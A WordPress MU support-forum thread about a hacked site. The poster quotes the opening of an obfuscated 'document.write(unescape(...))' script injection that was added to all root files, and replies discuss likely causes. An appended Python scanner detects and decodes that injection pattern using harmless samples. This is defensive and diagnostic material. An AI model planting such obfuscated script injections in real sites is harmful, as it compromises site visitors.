The MU forums have moved to WordPress.org

My WPMU site was HACKED (8 posts)

  1. sclif
    Member
    Posted 16 years ago #

    (3 hours ago) Malicious code has been added to all files (php and html) in the root directory. Access to the administrator panel has stopped. Blogs were displayed with PHP warnings. Nobody knows how it happened...

    The beginning of the harmful code: <! - ae85dbc48cab8ca9cb12842273be8777-> <script> document.write (unescape ("%3Cscript%3Eif%28fX%21%3D1%29%7Bfunction%20ZXsyoS%28LsiVeGwvIp%29%7Breturn%20LsiVeGwvIp%7Dfunction%20TQB...

    Removal from the file wpmu-setting.php has restored service capability.

    The wpmu version is 1.2.5a

  2. theapparatus
    Member
    Posted 16 years ago #

    The wpmu version 1.2.5a

    Upgrading when the newer version came out last month may have been a good idea.

    http://codex.wordpress.org/Hardening_WordPress

    Not sure why you chose that specific file to remove as it's needed by mu.

    Best bet would be to delete the files and replace them with your latest safe backup and upgrade to 1.3. Keeping an eye on the versions may be a good idea as well for future reference.

    edit: Not sure what html files you're hinting at as there aren't any in the download.

  3. andrea_r
    Moderator
    Posted 16 years ago #

    So, did you have any plugins installed that let users run scripts?

  4. sclif
    Member
    Posted 16 years ago #

    Thanks. But how about xmlrpc in version 1.3? And other limits?

    The HTML files are for installing a cookie for Google Analytics, so that my own traffic is not counted.

  5. sclif
    Member
    Posted 16 years ago #

    andrea_r, NO.
    There are no users at all. Plugins are disabled for users. I use a few plugins, only for my own blogs:
    bad-behavior (for main site only)
    redirection (test on one post of some blog)
    signup-question (for main site only)

    anarchy media (in mu-plugins)
    feedback (in mu-plugins)
    kb notify admin (in mu-plugins).

    The site address: http://vlavla.com

  6. ekusteve
    Member
    Posted 16 years ago #

    Just a guess, but I would guess that they got in through your server (or some other app on the server) and not Mu...if it were Mu, we would be seeing a lot of this here and, to my knowledge, this is the first...at least that I can recall.

    Steve

  7. demonicume
    Member
    Posted 16 years ago #

    no, i got hacked once. it was from the xmlrpc issue, though.

  8. andrea_r
    Moderator
    Posted 16 years ago #

    I got lightly hacked early on as well.. it was a permissions/stupid password issue.
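
The first post describes a 32-hex-digit HTML comment followed by `<script> document.write (unescape ("%3Cscript...` appended to every php and html file in the web root. As an added example that is not part of the original thread, the following Python sketch walks a directory, flags files carrying that pattern and decodes the percent-encoded argument for review. The function names, the 200-character look-behind window, the extension list and the sample marker and payload are assumptions constructed for illustration.

```python
import os
import re
import tempfile
from urllib.parse import unquote

# Both patterns tolerate stray spaces, because the post shows the code garbled that way.
WRITE_UNESCAPE = re.compile(
    r"document\.write\s*\(\s*unescape\s*\(\s*([\"'])(?P<enc>.*?)\1", re.I | re.S)
MARKER = re.compile(r"<!\s*-\s*-?\s*(?P<id>[0-9a-f]{32})\s*-?\s*-\s*>", re.I)

def find_injections(text):
    """Findings for each write(unescape(..)) whose decoded argument opens <script>."""
    findings = []
    for m in WRITE_UNESCAPE.finditer(text):
        decoded = unquote(m.group("enc"))
        if decoded.lstrip().lower().startswith("<script"):
            # Marker comment, if any, within 200 characters before the call.
            marker = MARKER.search(text, max(0, m.start() - 200), m.start())
            findings.append({"offset": m.start(), "decoded": decoded[:120],
                             "marker": marker.group("id") if marker else None})
    return findings

def scan_tree(root, exts=(".php", ".html", ".htm", ".js")):
    """Walk root; map relative path -> findings for files that match."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = find_injections(fh.read())
            if found:
                hits[os.path.relpath(path, root)] = found
    return hits

def demo():
    """Scan a temporary directory holding two constructed sample files."""
    bad = ('<?php echo "ok"; ?>\n<!--00112233445566778899aabbccddeeff-->'
           '<script>document.write(unescape("%3Cscript%3Evar%20x%3D1%3B%3C%2Fscript%3E"))</script>\n')
    good = '<script>document.write(unescape("%48ello"))</script>\n'
    with tempfile.TemporaryDirectory() as root:
        for name, body in (("index.php", bad), ("clean.html", good)):
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)

if __name__ == "__main__":
    print(demo())
```

A hit only tells you which files to restore from a known-good copy; it does not show how the files were modified in the first place.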
